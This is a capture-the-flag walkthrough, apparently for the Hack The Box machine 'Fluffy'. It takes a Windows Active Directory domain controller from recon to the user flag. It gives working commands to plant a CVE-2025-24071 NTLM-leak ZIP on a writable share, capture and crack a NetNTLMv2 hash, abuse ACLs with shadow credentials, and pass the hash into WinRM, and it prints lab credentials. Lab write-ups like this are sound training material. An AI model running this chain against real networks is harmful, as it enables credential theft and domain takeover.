Fluffy
An assume-breach Windows AD box where a writable SMB share lets you plant a malicious .library-ms ZIP (CVE-2025-24071) to coerce a user's NetNTLMv2 hash; cracking it and abusing a GenericAll/GenericWrite ACL chain via shadow credentials yields a service account with WinRM access and the user flag.
Overview
Fluffy is an easy-difficulty Windows Active Directory machine built around an assume-breach scenario: you start with credentials for a low-privileged user. The path to user is a tidy modern AD chain — a writable SMB share enables a CVE-2025-24071 NTLM-leak to capture and crack a second user’s hash, then a BloodHound-mapped ACL chain (GenericAll over a group → GenericWrite over service accounts) is abused with shadow credentials to land a WinRM shell. This post covers recon through the user flag.
Machine Matrix
Modern AD chain: CVE-2025-24071 NTLM-leak via writable share, then BloodHound-mapped ACL abuse with shadow credentials — enumeration and realistic AD misconfigs, moderate custom chaining.
Recon
| Port | Service | Notes |
|---|---|---|
| 53/tcp | DNS | Simple DNS Plus |
| 88/tcp | Kerberos | DC |
| 135/139/445 | RPC / SMB | Microsoft-DS |
| 389/636/3268/3269 | LDAP / LDAPS | Domain: fluffy.htb |
| 443/tcp | HTTPS | IIS 10.0 |
| 5985/tcp | WinRM | HTTPAPI 2.0 |
1
ports=$(nmap --open 10.10.10.X | grep open | cut -d ' ' -f 1 | cut -d '/' -f 1 | paste -sd,); nmap 10.10.10.X -p $ports -sV -sC -Pn --disable-arp-ping
SMB, LDAP and Kerberos together identify a Domain Controller. The LDAP cert and scan name it dc01.fluffy.htb in domain fluffy.htb, so add both to /etc/hosts:
1
echo "10.10.10.X fluffy.htb dc01.fluffy.htb" | sudo tee -a /etc/hosts
Enumeration
With the provided credentials (j.fleischman), enumerate SMB shares:
1
netexec smb 10.10.10.X -u 'j.fleischman' -p '<pass>' --shares
An IT share comes back with READ,WRITE — the key finding. Connecting to it reveals an Upgrade_Notice.pdf:
1
smbclient '//10.10.10.X/IT' -U 'j.fleischman%<pass>' -c "get Upgrade_Notice.pdf"
The PDF is an IT-department patch notice listing recently disclosed CVEs. One stands out: CVE-2025-24071, a Windows File Explorer spoofing vulnerability that leaks a user’s NTLM hash when a crafted .library-ms file inside an extracted ZIP/RAR is rendered. Since we have a writable share that other users browse, this is the foothold.
Foothold
1 — Build the malicious archive. The public PoC generates an exploit.zip containing a .library-ms whose UNC path points back at our listener:
1
2
git clone https://github.com/0x6rss/CVE-2025-24071_PoC.git
python3 CVE-2025-24071_PoC/poc.py # enter a filename + your tun0 IP at the prompts
2 — Start Responder in a second terminal to catch the inbound SMB authentication:
1
sudo responder -I tun0
3 — Drop the ZIP into the writable share and wait. When a higher-privileged user browses IT, Explorer auto-resolves the embedded UNC path and authenticates — no click required:
1
smbclient '//10.10.10.X/IT' -U 'j.fleischman%<pass>' -c "put exploit.zip"
Within seconds Responder logs a NetNTLMv2 hash for p.agila.
4 — Crack it offline with hashcat:
1
hashcat -a 0 -m 5600 hash /usr/share/wordlists/rockyou.txt # -> prometheusx-303
Now we have a second set of credentials: p.agila : prometheusx-303.
5 — Map the AD attack path with BloodHound.
1
bloodhound-python -d fluffy.htb -u 'p.agila' -p 'prometheusx-303' -dc 'dc01.fluffy.htb' -c all -ns 10.10.10.X
Two delegated ACLs chain together:
p.agilais in Service Account Managers, which hasGenericAllover the Service Accounts group.- Service Accounts has
GenericWriteoverca_svc,winrm_svc, andldap_svc— andwinrm_svcis a member of Remote Management Users (so it can use WinRM).
6 — Self-add to the group. GenericAll over the group lets us add ourselves:
1
bloodyAD -u 'p.agila' -p 'prometheusx-303' -d fluffy.htb --host 10.10.10.X add groupMember 'service accounts' p.agila
7 — Shadow credentials to recover winrm_svc’s hash. As a member of Service Accounts we now have GenericWrite over the service accounts, which lets us write the msDS-KeyCredentialLink attribute. Certipy automates the Key Trust / PKINIT flow and dumps the NT hash:
1
2
certipy-ad shadow auto -username [email protected] -password 'prometheusx-303' -account winrm_svc
# -> NT hash for 'winrm_svc': 33bd09dcd697600edf6b3a7af4875767
If you hit KRB_AP_ERR_SKEW, sync your clock to the DC first (sudo ntpdate dc01.fluffy.htb).
8 — Pass-the-hash into WinRM.
1
evil-winrm -u 'winrm_svc' -H 33bd09dcd697600edf6b3a7af4875767 -i dc01.fluffy.htb
User flag
A shell as fluffy\winrm_svc lands us the user flag:
1
type C:\Users\winrm_svc\Desktop\user.txt # [redacted]
The privilege escalation to Administrator goes through an ADCS ESC16 misconfiguration — out of scope for this post, which stops at user.